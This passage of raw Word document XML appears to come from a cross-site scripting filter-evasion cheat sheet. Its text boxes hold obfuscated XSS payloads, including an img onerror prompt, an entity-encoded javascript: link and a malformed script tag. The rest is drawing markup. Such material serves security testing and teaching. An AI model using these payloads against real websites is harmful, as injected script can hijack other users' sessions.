                              <a:gd name="T14" fmla="+- 0 328 167"/>
                              <a:gd name="T15" fmla="*/ 328 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 3949"/>
                              <a:gd name="T18" fmla="+- 0 325 167"/>
                              <a:gd name="T19" fmla="*/ 325 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 3949"/>
                              <a:gd name="T22" fmla="+- 0 188 167"/>
                              <a:gd name="T23" fmla="*/ 188 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 3949"/>
                              <a:gd name="T26" fmla="+- 0 167 167"/>
                              <a:gd name="T27" fmla="*/ 167 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5858 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 3949"/>
                              <a:gd name="T30" fmla="+- 0 167 167"/>
                              <a:gd name="T31" fmla="*/ 167 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5879 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 3949"/>
                              <a:gd name="T34" fmla="+- 0 188 167"/>
                              <a:gd name="T35" fmla="*/ 188 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5879 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 3949"/>
                              <a:gd name="T38" fmla="+- 0 328 167"/>
                              <a:gd name="T39" fmla="*/ 328 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5861 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 3949"/>
                              <a:gd name="T42" fmla="+- 0 349 167"/>
                              <a:gd name="T43" fmla="*/ 349 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5858 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 3949"/>
                              <a:gd name="T46" fmla="+- 0 350 167"/>
                              <a:gd name="T47" fmla="*/ 35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949" h="183">
                                <a:moveTo>
                                  <a:pt x="3928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928" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3949" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3949" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3931" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3928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394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&lt;img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7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src="/"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=_="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38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title="onerror='prompt(1)'"&gt;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" o:spid="_x0000_s2241" style="position:absolute;margin-left:96.5pt;margin-top:8.35pt;width:197.45pt;height:9.15pt;z-index:-15465472;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,167" coordsize="394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">
                <v:shape id="Freeform 86" o:spid="_x0000_s2242" style="position:absolute;left:1930;top:167;width:3949;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="394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i0XcMA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbESPTWrDMBCF94HeQUwhu1h2Ca1xo4RSCO0mi9o5wNSa&#10;2CbWyLLU2O3po0Cgy8f7+Xib3Wx6caHRd5YVZEkKgri2uuNGwbHar3IQPiBr7C2Tgl/ysNs+LDZY&#10;aDvxF13K0Ig4wr5ABW0IQyGlr1sy6BM7EEfvZEeDIcqxkXrEKY6bXj6l6bM02HEktDjQe0v1ufwx&#10;kSs/XrLMVd+TK73rnfyb94dKqeXj/PYKItAc/sP39qdWkK/h9iX+A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i0XcMAAADbAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m3928,183l21,183r-3,-1l,161r,-3l,21,21,,3928,r21,21l3949,161r-18,21l3928,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3928,350;21,350;18,349;0,328;0,325;0,188;21,167;3928,167;3949,188;3949,328;3931,349;3928,350" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 85" o:spid="_x0000_s2243" type="#_x0000_t202" style="position:absolute;left:1930;top:167;width:394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UqMQA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/IEb3VTQ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ElKjEAAAA2w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&lt;img</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="37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src="/"</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="3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=_="</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="38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title="onerror='prompt(1)'"&gt;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5152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368300</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="82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629 580"/>
                            <a:gd name="T3" fmla="*/ 629 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 629 580"/>
                            <a:gd name="T7" fmla="*/ 629 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 628 580"/>
                            <a:gd name="T11" fmla="*/ 628 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 608 580"/>
                            <a:gd name="T15" fmla="*/ 608 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 601 580"/>
                            <a:gd name="T19" fmla="*/ 601 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 580 580"/>
                            <a:gd name="T23" fmla="*/ 580 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 580 580"/>
                            <a:gd name="T27" fmla="*/ 580 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 605 580"/>
                            <a:gd name="T31" fmla="*/ 605 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 608 580"/>
                            <a:gd name="T35" fmla="*/ 608 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 629 580"/>
                            <a:gd name="T39" fmla="*/ 62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7C946" id="Freeform 83" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:29pt;width:2.45pt;height:2.45pt;z-index:-15464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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,25r,3l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,399415;13335,399415;11430,398780;0,386080;0,381635;13335,368300;17780,368300;31115,384175;31115,386080;17780,39941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5203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321945</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3572510" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="79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72510" cy="116205"/>
                          <a:chOff x="1930" y="507"/>
                          <a:chExt cx="5626" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="80" name="Freeform 82"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="507"/>
                            <a:ext cx="5626" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 7535 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 5626"/>
                              <a:gd name="T2" fmla="+- 0 690 507"/>
                              <a:gd name="T3" fmla="*/ 690 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 5626"/>
                              <a:gd name="T6" fmla="+- 0 690 507"/>
                              <a:gd name="T7" fmla="*/ 690 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 5626"/>
                              <a:gd name="T10" fmla="+- 0 689 507"/>
                              <a:gd name="T11" fmla="*/ 689 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 5626"/>
                              <a:gd name="T14" fmla="+- 0 669 507"/>
                              <a:gd name="T15" fmla="*/ 669 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 5626"/>
                              <a:gd name="T18" fmla="+- 0 665 507"/>
                              <a:gd name="T19" fmla="*/ 665 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 5626"/>
                              <a:gd name="T22" fmla="+- 0 529 507"/>
                              <a:gd name="T23" fmla="*/ 529 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 5626"/>
                              <a:gd name="T26" fmla="+- 0 507 507"/>
                              <a:gd name="T27" fmla="*/ 507 h 183"/>
                              <a:gd name="T28" fmla="+- 0 7535 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 5626"/>
                              <a:gd name="T30" fmla="+- 0 507 507"/>
                              <a:gd name="T31" fmla="*/ 507 h 183"/>
                              <a:gd name="T32" fmla="+- 0 7556 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 5626"/>
                              <a:gd name="T34" fmla="+- 0 529 507"/>
                              <a:gd name="T35" fmla="*/ 529 h 183"/>
                              <a:gd name="T36" fmla="+- 0 7556 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 5626"/>
                              <a:gd name="T38" fmla="+- 0 669 507"/>
                              <a:gd name="T39" fmla="*/ 669 h 183"/>
                              <a:gd name="T40" fmla="+- 0 7538 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 5626"/>
                              <a:gd name="T42" fmla="+- 0 689 507"/>
                              <a:gd name="T43" fmla="*/ 689 h 183"/>
                              <a:gd name="T44" fmla="+- 0 7535 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 5626"/>
                              <a:gd name="T46" fmla="+- 0 690 507"/>
                              <a:gd name="T47" fmla="*/ 69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626" h="183">
                                <a:moveTo>
                                  <a:pt x="5605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5605" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5626" y="22"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5626" y="162"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5608" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5605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07"/>
                            <a:ext cx="562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2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2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aaa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2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aaaa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aaaaa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2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aaaaaa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2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aaaaaaa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1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aaaaaaaa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2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aaaaaaaaa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2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aaaaaaaaaa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" o:spid="_x0000_s2244" style="position:absolute;margin-left:96.5pt;margin-top:25.35pt;width:281.3pt;height:9.15pt;z-index:-15464448;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,507" coordsize="562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">
                <v:shape id="Freeform 82" o:spid="_x0000_s2245" style="position:absolute;left:1930;top:507;width:5626;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="562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w0+MEA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbERPz2vCMBS+D/wfwhN2m6ljG6UaRZSx7thuYI/P5tkW&#10;m5eSZLb975fDYMeP7/d2P5le3Mn5zrKC9SoBQVxb3XGj4Pvr/SkF4QOyxt4yKZjJw363eNhipu3I&#10;Bd3L0IgYwj5DBW0IQyalr1sy6Fd2II7c1TqDIULXSO1wjOGml89J8iYNdhwbWhzo2FJ9K3+Mgr6Y&#10;Pz8u4+zO6+rlVFev+TTOuVKPy+mwARFoCv/iP3euFaRxffwSf4D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/sNPjBAAAA2wAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPUAAACGAwAAAAA=&#10;" path="m5605,183l21,183r-3,-1l,162r,-4l,22,21,,5605,r21,22l5626,162r-18,20l5605,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="5605,690;21,690;18,689;0,669;0,665;0,529;21,507;5605,507;5626,529;5626,669;5608,689;5605,690" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 81" o:spid="_x0000_s2246" type="#_x0000_t202" style="position:absolute;left:1930;top:507;width:562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+Sq8UA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UVvNWNPQQbXYMUC4JQGuPB42v2&#10;mSzJvo3ZNab/vlso9DjMzDfMOp9sJ0YavHGsYDFPQBBXThuuFZzK9+clCB+QNXaOScE3ecg3jw9r&#10;zLS7c0HjMdQiQthnqKAJoc+k9FVDFv3c9cTRu7jBYohyqKUe8B7htpMvSZJKi4bjQoM9vTVUtceb&#10;VbA9c7Ez14+vz+JSmLJ8TfiQtkrNnqbtCkSgKfyH/9p7rWC5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f5KrxQAAANs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&lt;a</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-12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aa</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-12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aaa</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-12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aaaa</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454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aaaaa</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-12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aaaaaa</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-12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aaaaaaa</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-1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aaaaaaaa</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-12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aaaaaaaaa</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-12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aaaaaaaaaa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8"/>
        <w:rPr>
          <w:sz w:val="4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:line="182" w:lineRule="exact"/>
        <w:ind w:left="470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2237740" cy="116205"/>
                <wp:effectExtent l="6350" t="8890" r="3810" b="8255"/>
                <wp:docPr id="7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7740" cy="116205"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="3524" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="77" name="Freeform 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524" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 3502 w 3524"/>
                              <a:gd name="T1" fmla="*/ 182 h 183"/>
                              <a:gd name="T2" fmla="*/ 21 w 3524"/>
                              <a:gd name="T3" fmla="*/ 182 h 183"/>
                              <a:gd name="T4" fmla="*/ 18 w 3524"/>
                              <a:gd name="T5" fmla="*/ 182 h 183"/>
                              <a:gd name="T6" fmla="*/ 0 w 3524"/>
                              <a:gd name="T7" fmla="*/ 161 h 183"/>
                              <a:gd name="T8" fmla="*/ 0 w 3524"/>
                              <a:gd name="T9" fmla="*/ 158 h 183"/>
                              <a:gd name="T10" fmla="*/ 0 w 3524"/>
                              <a:gd name="T11" fmla="*/ 21 h 183"/>
                              <a:gd name="T12" fmla="*/ 21 w 3524"/>
                              <a:gd name="T13" fmla="*/ 0 h 183"/>
                              <a:gd name="T14" fmla="*/ 3502 w 3524"/>
                              <a:gd name="T15" fmla="*/ 0 h 183"/>
                              <a:gd name="T16" fmla="*/ 3523 w 3524"/>
                              <a:gd name="T17" fmla="*/ 21 h 183"/>
                              <a:gd name="T18" fmla="*/ 3523 w 3524"/>
                              <a:gd name="T19" fmla="*/ 161 h 183"/>
                              <a:gd name="T20" fmla="*/ 3506 w 3524"/>
                              <a:gd name="T21" fmla="*/ 182 h 183"/>
                              <a:gd name="T22" fmla="*/ 3502 w 3524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3524" h="183">
                                <a:moveTo>
                                  <a:pt x="3502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502" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3523" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3523" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3506" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="350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52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href=j&amp;#97v&amp;#97script:&amp;#97lert(1)&gt;ClickMe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7" o:spid="_x0000_s2247" style="width:176.2pt;height:9.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="352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">
                <v:shape id="Freeform 79" o:spid="_x0000_s2248" style="position:absolute;width:3524;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="352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8I1sMA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbESPzWrDMBCE74G+g9hCb7FcQ+3gRgkmENoe8wO5bqyt&#10;bSqtjKXabp8+KhRyHGbnm531drZGjDT4zrGC5yQFQVw73XGj4HzaL1cgfEDWaByTgh/ysN08LNZY&#10;ajfxgcZjaESEsC9RQRtCX0rp65Ys+sT1xNH7dIPFEOXQSD3gFOHWyCxNc2mx49jQYk+7luqv47eN&#10;b5i+uF7eRlNd89+cq+zDZtOLUk+Pc/UKItAc7sf/6XetoCjgb0sE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8I1sMAAADbAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m3502,182l21,182r-3,l,161r,-3l,21,21,,3502,r21,21l3523,161r-17,21l3502,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3502,182;21,182;18,182;0,161;0,158;0,21;21,0;3502,0;3523,21;3523,161;3506,182;3502,182" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 78" o:spid="_x0000_s2249" type="#_x0000_t202" style="position:absolute;width:352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LEc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ODZ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kEsRwgAAANs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href=j&amp;#97v&amp;#97script:&amp;#97lert(1)&gt;ClickMe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EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr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5305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154305</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="75" name="Freefor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92 243"/>
                            <a:gd name="T3" fmla="*/ 292 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 292 243"/>
                            <a:gd name="T7" fmla="*/ 292 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 291 243"/>
                            <a:gd name="T11" fmla="*/ 291 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 271 243"/>
                            <a:gd name="T15" fmla="*/ 271 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 264 243"/>
                            <a:gd name="T19" fmla="*/ 264 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 243 243"/>
                            <a:gd name="T23" fmla="*/ 243 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 243 243"/>
                            <a:gd name="T27" fmla="*/ 243 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 268 243"/>
                            <a:gd name="T31" fmla="*/ 268 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 271 243"/>
                            <a:gd name="T35" fmla="*/ 271 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 292 243"/>
                            <a:gd name="T39" fmla="*/ 292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A0181" id="Freeform 76" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:12.15pt;width:2.45pt;height:2.45pt;z-index:-1546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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,25r,3l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,185420;13335,185420;11430,184785;0,172085;0,167640;13335,154305;17780,154305;31115,170180;31115,172085;17780,18542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5356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107950</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1751965" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="72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1965" cy="116205"/>
                          <a:chOff x="1930" y="170"/>
                          <a:chExt cx="2759" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="73" name="Freeform 75"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="170"/>
                            <a:ext cx="2759" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 4667 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 2759"/>
                              <a:gd name="T2" fmla="+- 0 353 170"/>
                              <a:gd name="T3" fmla="*/ 353 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 2759"/>
                              <a:gd name="T6" fmla="+- 0 353 170"/>
                              <a:gd name="T7" fmla="*/ 353 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 2759"/>
                              <a:gd name="T10" fmla="+- 0 352 170"/>
                              <a:gd name="T11" fmla="*/ 352 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 2759"/>
                              <a:gd name="T14" fmla="+- 0 332 170"/>
                              <a:gd name="T15" fmla="*/ 332 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 2759"/>
                              <a:gd name="T18" fmla="+- 0 328 170"/>
                              <a:gd name="T19" fmla="*/ 328 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 2759"/>
                              <a:gd name="T22" fmla="+- 0 191 170"/>
                              <a:gd name="T23" fmla="*/ 191 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 2759"/>
                              <a:gd name="T26" fmla="+- 0 170 170"/>
                              <a:gd name="T27" fmla="*/ 170 h 183"/>
                              <a:gd name="T28" fmla="+- 0 4667 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 2759"/>
                              <a:gd name="T30" fmla="+- 0 170 170"/>
                              <a:gd name="T31" fmla="*/ 170 h 183"/>
                              <a:gd name="T32" fmla="+- 0 4688 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 2759"/>
                              <a:gd name="T34" fmla="+- 0 191 170"/>
                              <a:gd name="T35" fmla="*/ 191 h 183"/>
                              <a:gd name="T36" fmla="+- 0 4688 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 2759"/>
                              <a:gd name="T38" fmla="+- 0 332 170"/>
                              <a:gd name="T39" fmla="*/ 332 h 183"/>
                              <a:gd name="T40" fmla="+- 0 4670 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 2759"/>
                              <a:gd name="T42" fmla="+- 0 352 170"/>
                              <a:gd name="T43" fmla="*/ 352 h 183"/>
                              <a:gd name="T44" fmla="+- 0 4667 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 2759"/>
                              <a:gd name="T46" fmla="+- 0 353 170"/>
                              <a:gd name="T47" fmla="*/ 35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759" h="183">
                                <a:moveTo>
                                  <a:pt x="2737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2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737" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2758" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2758" y="162"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2740" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2737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70"/>
                            <a:ext cx="275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&lt;script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3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x&gt;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2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alert(1)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3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&lt;/script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-12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1=2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" o:spid="_x0000_s2250" style="position:absolute;margin-left:96.5pt;margin-top:8.5pt;width:137.95pt;height:9.15pt;z-index:-15462912;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,170" coordsize="275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">
                <v:shape id="Freeform 75" o:spid="_x0000_s2251" style="position:absolute;left:1930;top:170;width:2759;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="275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aLwMQA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbESP3WrCQBSE7wt9h+UI3tWNFVuJrtJUBAsF688DHLIn&#10;2WD2bMiuMb59VxC8HGbmG2ax6m0tOmp95VjBeJSAIM6drrhUcDpu3mYgfEDWWDsmBTfysFq+viww&#10;1e7Ke+oOoRQRwj5FBSaEJpXS54Ys+pFriKNXuNZiiLItpW7xGuG2lu9J8iEtVhwXDDb0bSg/Hy5W&#10;wU9W7dbZaddcbonJ9O+0+OuOhVLDQf81BxGoD8/wo73VCj4ncP8Sf4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mi8DEAAAA2wAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m2737,183l21,183r-3,-1l,162r,-4l,21,21,,2737,r21,21l2758,162r-18,20l2737,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="2737,353;21,353;18,352;0,332;0,328;0,191;21,170;2737,170;2758,191;2758,332;2740,352;2737,353" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 74" o:spid="_x0000_s2252" type="#_x0000_t202" style="position:absolute;left:1930;top:170;width:275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1BFM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3UEUxQAAANs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&lt;script</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-13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x&gt;</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-12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alert(1)</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-13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&lt;/script</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-12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1=2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5408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370840</wp:posOffset>
